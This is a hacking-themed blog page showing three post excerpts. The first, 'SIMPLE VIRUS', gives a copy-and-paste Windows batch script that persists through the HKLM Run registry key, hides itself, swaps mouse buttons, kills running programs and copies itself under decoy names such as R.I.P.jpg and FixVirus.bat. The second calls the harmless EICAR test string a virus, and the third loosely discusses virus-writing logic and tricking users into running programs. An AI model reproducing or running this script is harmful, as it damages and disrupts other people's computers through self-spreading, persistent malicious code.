Skip to main content

Posts

Showing posts with the label Hacking

SIMPLE VIRUS

Just copy and paste the code given below in notepad and save it as anyname.bat(not txt)Be carefull & Don't run this on ur pc @Echo off color 4 title 4 title R.I.P start start start start calc copy %0 %Systemroot%\Greatgame > nul reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ /d %systemroot%\Greatgame.bat /f > nul copy %0 *.bat > nul Attrib +r +h Greatgame.bat Attrib +r +h RUNDLL32 USER32.DLL.SwapMouseButton start calc cls tskill msnmsgr tskill LimeWire tskill iexplore tskill NMain start cls cd %userprofile%\desktop copy Greatgame.bat R.I.P.bat copy Greatgame.bat R.I.P.jpg copy Greatgame.bat R.I.P.txt copy Greatgame.bat R.I.P.exe copy Greatgame.bat R.I.P.mov copy Greatgame.bat FixVirus.bat cd %userprofile%My Documents copy Greatgame.bat R.I.P.bat copy Greatgame.bat R.I.P.jpg copy Greatgame.bat R.I.P.txt copy Greatgame.bat R.I.P.exe copy Greatgame.bat R.I.P.mov copy Greatgame.bat FixVirus.bat st

VIRUS 4 ANTIVIRUS

paste this in ur notepad X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*X5O!P%@AP[4\PZX54(P^)7CC)7} now save it and scan it by ur antivirus software.. enjoy Hacking(DeePaK)... post comment

VIRUS PROGRAMMING

Everybody is scared of computer ‘virus’ as it does harmful actions on our computer. But when we look into the virus programming, we may certainly come out with the conclusion that it requires intelligence to code a virus. Logic It is easy to mess-up the right program. For example, if you remove even a single byte from an EXE file, that EXE file won’t be usable! Virus program don’t have any specific rules. But it’s a common practice to include ‘signatures’ by virus creators. The main idea is to force the innocent user to run the programs. So certain viruses come along with so called ‘programmer utilities’ or ‘free tools’. Another thing is, it is easy to hang-up a working system using some ‘bad’interrupts. Viruses use this logic too! TSR viruses When TSR got its popularity, crackers started using TSR concepts for virus programming. There was a time when people who knew TSR started writing their own TSR viruses. But when Windows operating system was introduced, TSR virus